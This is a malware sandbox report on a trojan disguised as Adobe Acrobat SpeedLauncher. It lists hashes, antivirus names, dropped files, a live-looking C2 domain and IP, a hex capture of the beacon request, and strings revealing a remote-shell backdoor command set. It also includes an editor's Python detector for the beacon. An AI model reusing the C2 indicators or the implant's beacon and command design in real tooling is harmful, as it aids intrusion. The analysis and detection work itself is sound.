Analysis Date: 2014-01-03 10:59:16
MD5: 5e42780f52763c77d592044e535e4b01
SHA1: 749709b85d2cbc32c56e368f80fb4d4dcb70241c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: d1846d4f6e59b61c85cbe19b6e516d8c sha1: e61c108e54760f4f6e2527afa4dbca153c42e756 size: 11264
Section .rdata md5: 6356fbb46ece2cba555bbbf3db04c95d sha1: 546656aa751db6826535dff4d865a399ee6a13ff size: 3584
Section .data  md5: c6236a3d2692e03c79b2805c1bccdd6a sha1: 52dc69966a3ef83cb21a40c987ca7a3cec13abda size: 2560
Section .rsrc  md5: 8fbfba501adb1c75c8a1c324872ad328 sha1: 94719d1b1a16013df1aa3fe0767cd76b9a6ca7b7 size: 1536
Timestamp: 2010-11-17 13:37:00
Version:
  LegalCopyright: Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
  FileVersion: 9.0.0.332
  CompanyName: Adobe Systems Incorporated
  Comments:
  ProductName: Adobe Acrobat
  ProductVersion: 9, 0, 0, 0
  FileDescription: Adobe Acrobat SpeedLauncher
  OriginalFilename: AcroSpeedLaunch.exe
Packer: Microsoft Visual C++ v6.0 (a compiler signature, not a packer; the standard .text/.rdata/.data/.rsrc layout above is that of an unpacked MSVC build)
PEhash: 35fb281c5f462171ab2f2a96af23e2c56b514ad6
AV avira: TR/Downloader.Gen
AV clamav: Win.Trojan.Agent-65195
AV avg: Agent2.BVRT

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Creates Mutex: GLOBAL\MSFT64
Winsock URL: http://admin.datastorage01.org/postinfo.html

Network Details:

DNS: admin.datastorage01.org
Type: A
96.43.141.186
HTTP GET: http://admin.datastorage01.org/postinfo.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; COMPUTER-XXXXXX;Trident/4.0) 02:01
Flows: TCP 192.168.1.1:1031 ➝ 96.43.141.186:80

Raw Pcap
0x00000000 (00000)   47455420 2f706f73 74696e66 6f2e6874   GET /postinfo.ht
0x00000010 (00016)   6d6c2048 5454502f 312e310d 0a557365   ml HTTP/1.1..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   3b204d53 49452038 2e303b20 57696e64   ; MSIE 8.0; Wind
0x00000050 (00080)   6f777320 4e542035 2e313b20 434f4d50   ows NT 5.1; COMP
0x00000060 (00096)   55544552 2d585858 5858583b 54726964   UTER-XXXXXX;Trid
0x00000070 (00112)   656e742f 342e3029 2030323a 3031200d   ent/4.0) 02:01 .
0x00000080 (00128)   0a486f73 743a2061 646d696e 2e646174   .Host: admin.dat
0x00000090 (00144)   6173746f 72616765 30312e6f 72670d0a   astorage01.org..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....
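The captured check-in above, decoded and matched against the User-Agent template that the binary carries in its strings (`Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d `), as an added detection example that is not part of the sandbox report. The hex is copied from the Raw Pcap dump; the function names, the regular expression, the scoring rule and the benign IE8 User-Agent used for comparison are the editor's own assumptions, not anything the sample or the sandbox produced.

```python
import re
from typing import Dict, Optional, Tuple

# Hex columns copied from the Raw Pcap dump above (the sandbox's captured GET
# to admin.datastorage01.org); offsets and the ASCII column are dropped.
RAW_PCAP_HEX = """
47455420 2f706f73 74696e66 6f2e6874
6d6c2048 5454502f 312e310d 0a557365
722d4167 656e743a 204d6f7a 696c6c61
2f342e30 2028636f 6d706174 69626c65
3b204d53 49452038 2e303b20 57696e64
6f777320 4e542035 2e313b20 434f4d50
55544552 2d585858 5858583b 54726964
656e742f 342e3029 2030323a 3031200d
0a486f73 743a2061 646d696e 2e646174
6173746f 72616765 30312e6f 72670d0a
43616368 652d436f 6e74726f 6c3a206e
6f2d6361 6368650d 0a0d0a
"""

# Regex derived (editor's assumption) from the sprintf template in the Strings section:
#   Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d
# Two details separate it from a genuine IE8 User-Agent: the %s token (the computer
# name in the capture) is glued to "Trident" with no space, and a two-digit pair
# (presumably hour:minute from GetLocalTime, an assumption) trails the closing ")".
BEACON_UA_RE = re.compile(
    r"^Mozilla/4\.0 \(compatible; MSIE 8\.0; Windows NT (?P<major>\d+)\.(?P<minor>\d+); "
    r"(?P<hostname>[^;]+);Trident/4\.0\) (?P<hh>\d{2}):(?P<mm>\d{2})\s*$"
)

C2_HOST = "admin.datastorage01.org"   # from the DNS / Host header in this report
C2_PATH = "/postinfo.html"            # from the HTTP GET in this report


def pcap_hex_to_bytes(dump: str) -> bytes:
    """Turn the whitespace-separated hex columns of the dump into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def parse_http_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split an HTTP/1.1 request into its request line and a lower-cased header map."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def match_beacon_user_agent(ua: str) -> Optional[Dict[str, str]]:
    """Return the fields the implant baked into the UA, or None if the template does not match."""
    m = BEACON_UA_RE.match(ua)
    if m is None:
        return None
    return {
        "nt_version": f"{m['major']}.{m['minor']}",
        "hostname": m["hostname"],
        "clock": f"{m['hh']}:{m['mm']}",
    }


def analyze_request(raw: bytes) -> Dict[str, object]:
    """Score one captured request against the indicators in this report (illustrative rule)."""
    request_line, headers = parse_http_request(raw)
    method, _, rest = request_line.partition(" ")
    path = rest.split(" ", 1)[0]
    ua_fields = match_beacon_user_agent(headers.get("user-agent", ""))
    hits = []
    if ua_fields is not None:
        hits.append("User-Agent matches implant sprintf template")
    if headers.get("host", "").lower() == C2_HOST:
        hits.append(f"Host header is known C2 {C2_HOST}")
    if method == "GET" and path == C2_PATH:
        hits.append(f"request path is C2 check-in {C2_PATH}")
    return {
        "request_line": request_line,
        "ua_fields": ua_fields,
        "hits": hits,
        # The UA template alone is enough to call it: it survives a change of C2 domain.
        "verdict": "beacon" if ua_fields is not None or len(hits) >= 2 else "clean",
    }


if __name__ == "__main__":
    captured = pcap_hex_to_bytes(RAW_PCAP_HEX)
    print(analyze_request(captured))
    # Constructed benign IE8 User-Agent (not from the report), to show the template
    # regex does not fire on a real browser string: "; Trident" has a space, no clock.
    print(match_beacon_user_agent("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"))
```

Matching on the User-Agent template rather than on the domain or IP is the durable choice here: the Host header and the path are infrastructure the operator can rotate, whereas the missing space before `Trident` and the trailing `HH:MM` come from the format string compiled into the binary. A network sensor that only strips leading and trailing whitespace from header values, as the parser above does, must still accept the trailing space the implant emits after the clock.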


Strings
040904b0
9, 0, 0, 0
9.0.0.332
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
 and the PID is %d
\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe
AttachConsole
blc-dwd
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
/C "%s"
__CxxFrameHandler
@.data
DefWindowProcA
DeleteFileA
DispatchMessageA
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
Failed with %d!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
GetSystemTime
GetTempFileNameA
GetTempPathA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\MSFT64
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KB968705.bat
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
MainWndClass
memcpy
memset
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d 
Mozilla/5.0
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVVWV
QVVVPVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegisterClassExA
RegSetValueExA
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetFileTime
SetStdHandle
__setusermatherr
SHCreateDirectoryExA
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
SystemTimeToFileTime
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t:hLU@
t<Ht2Ht(Ht
Totally %d volumes found.
TranslateMessage
Unkown		
URLDownloadToFileA
urlmon.dll
USER32.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
VPPPPh
VVhlQ@
VVVhX,@
WaitForSingleObject
whoami
width=
WININET.dll
WPhdR@
WriteConsoleInputA
WriteFile
_XcptFilter
YYh0U@
YYSSSSS
YYSSSVSS
YYt5j\
YYWWVh
YYWWVh93@
ZRichw